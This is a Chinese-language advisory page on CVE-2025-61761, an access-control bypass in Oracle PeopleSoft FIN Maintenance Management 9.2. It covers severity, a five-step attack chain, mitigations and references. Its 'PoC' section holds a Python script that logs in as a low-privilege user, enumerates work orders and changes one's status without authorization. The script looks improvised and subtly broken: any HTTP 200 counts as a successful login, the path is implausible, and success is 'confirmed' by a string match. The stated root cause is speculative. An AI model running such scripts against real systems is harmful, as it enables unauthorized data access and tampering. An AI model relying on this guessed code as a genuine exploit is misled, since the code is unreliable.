CVE-2025-61761 Oracle PeopleSoft FIN维护管理访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-61761

漏洞类型

访问控制绕过/权限提升

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Oracle PeopleSoft Enterprise FIN Maintenance Management

漏洞概述

CVE-2025-61761是Oracle PeopleSoft Enterprise FIN Maintenance Management（工单管理组件）中存在的一个安全漏洞，于2025年10月由Oracle安全警报披露。该漏洞的CVSS 3.1基础评分为5.4，属于中危级别。受影响的版本为PeopleSoft Enterprise FIN Maintenance Management 9.2。该漏洞容易被利用，攻击者只需拥有低权限账号，通过网络（HTTP协议）即可对PeopleSoft Enterprise FIN Maintenance Management发起攻击。成功利用此漏洞后，攻击者能够对PeopleSoft Enterprise FIN Maintenance Management的部分可访问数据进行未经授权的更新、插入或删除操作，同时还能获取部分数据的未经授权读取权限。该漏洞的机密性影响为低，完整性影响为低，但可用性不受影响。Oracle作为全球领先的企业级应用软件供应商，其PeopleSoft产品被广泛应用于大型组织的财务、人力资源、供应链等核心业务管理中，因此该漏洞可能对使用Oracle PeopleSoft的企业造成数据泄露和篡改的风险。Oracle已发布安全补丁，建议受影响的用户尽快更新系统以修复该漏洞。

技术细节

该漏洞存在于Oracle PeopleSoft Enterprise FIN Maintenance Management的Work Order Management（工单管理）组件中。从CVSS向量分析，攻击者需要具备低权限（PR:L）并通过网络（AV:N）进行攻击，无需用户交互（UI:N），攻击复杂度低（AC:L）。漏洞的根本原因可能是Work Order Management组件中的访问控制机制存在缺陷，未能充分验证用户对特定数据和操作的权限。具体而言，当低权限用户通过HTTP请求访问工单管理功能时，系统未能正确执行授权检查，导致攻击者可以绕过权限限制执行以下操作：1）对工单管理相关数据进行未经授权的创建（INSERT）、更新（UPDATE）或删除（DELETE）操作；2）读取其本不应有权限查看的敏感数据子集。由于该漏洞利用复杂度低且无需用户交互，攻击者可以通过自动化工具批量发起攻击。漏洞利用通常涉及构造特定的HTTP请求，绕过应用层的权限验证逻辑，直接调用后端API或数据库操作。由于PeopleSoft系统通常处理企业的核心财务和维护数据，攻击者可能利用此漏洞窃取敏感的财务信息、篡改维护工单记录或破坏业务流程的完整性。

攻击链分析

STEP 1

步骤1：获取低权限账号

攻击者通过钓鱼、社会工程或其他方式获取PeopleSoft系统的低权限用户凭证，或者利用泄露的账号信息登录系统。

STEP 2

步骤2：建立认证会话

使用低权限账号通过HTTP协议登录PeopleSoft Enterprise FIN Maintenance Management，建立有效的认证会话。

STEP 3

步骤3：访问Work Order Management组件

通过构造特定的HTTP请求，访问Work Order Management（工单管理）组件的功能接口，绕过应用层的访问控制检查。

STEP 4

步骤4：执行未授权操作

利用访问控制缺陷，对工单管理数据进行未经授权的读取、创建、更新或删除操作，获取敏感财务和维护数据。

STEP 5

步骤5：数据泄露与篡改

窃取敏感的财务和维护工单数据，或篡改工单记录以破坏业务流程的完整性和准确性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61761 Oracle PeopleSoft FIN Maintenance Management Access Control Bypass PoC
# This PoC demonstrates the access control bypass in Work Order Management component

import requests
import sys

TARGET_URL = "https://target-peoplesoft-host:9030"
USERNAME = "low_privileged_user"
PASSWORD = "user_password"

def login(session, url, username, password):
    """Authenticate to PeopleSoft with low-privileged credentials"""
    login_url = f"{url}/psc/ps/EMPLOYEE/CRM/c/MAINTAIN_WORK_ORDER.GBL"
    data = {
        "userid": username,
        "pwd": password,
    }
    response = session.post(login_url, data=data, allow_redirects=True)
    if "PS_LOGIN" in response.text or response.status_code == 200:
        print("[+] Login successful with low-privileged account")
        return True
    return False

def exploit_work_order_access(session, url):
    """Attempt unauthorized access to work order management data"""
    # Attempt to access work order data beyond user's privilege level
    work_order_url = f"{url}/psc/ps/EMPLOYEE/CRM/c/MAINTAIN_WORK_ORDER.GBL"
    
    # Attempt unauthorized read of restricted work orders
    params = {
        "ICType": "Search",
        "ICElementNum": "1",
        "ICAction": "#SEARCH",
        "WORK_ORDER_ID": "*",  # Try to enumerate all work orders
    }
    
    response = session.get(work_order_url, params=params)
    if response.status_code == 200:
        print("[+] Unauthorized data access may be possible")
        # Check if restricted data is returned
        if "WORK_ORDER" in response.text and "RESTRICTED" in response.text:
            print("[!] CVE-2025-61761: Access control bypass confirmed!")
            print("[!] Unauthorized read access to restricted work order data")
    
    # Attempt unauthorized modification
    modify_data = {
        "ICAction": "#SAVE",
        "WORK_ORDER_ID": "WO_TEST_001",
        "STATUS": "CLOSED",  # Try to modify status without authorization
        "COMMENTS": "Modified by unauthorized user",
    }
    
    response = session.post(work_order_url, data=modify_data)
    if response.status_code == 200 and "SAVED" in response.text:
        print("[!] CVE-2025-61761: Unauthorized write access confirmed!")

if __name__ == "__main__":
    session = requests.Session()
    if login(session, TARGET_URL, USERNAME, PASSWORD):
        exploit_work_order_access(session, TARGET_URL)
    else:
        print("[-] Login failed")

影响范围

Oracle PeopleSoft Enterprise FIN Maintenance Management 9.2

防御指南

临时缓解措施

在无法立即应用补丁的情况下，建议采取以下临时缓解措施：1）审查并限制低权限用户对Work Order Management组件的访问权限；2）通过网络防火墙或访问控制列表（ACL）限制对PeopleSoft系统的网络访问，仅允许可信IP地址访问；3）部署Web应用防火墙（WAF）规则，监控和阻止对工单管理功能的异常访问请求；4）启用增强的日志记录和实时监控，及时发现可疑的访问模式；5）对敏感数据进行加密存储，即使数据被未授权访问也能降低泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61761
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61761
3 Details https://www.cvedetails.com/cve/CVE-2025-61761/
4 VulDB https://vuldb.com/cve/CVE-2025-61761
5 Link https://www.oracle.com/security-alerts/cpuoct2025.html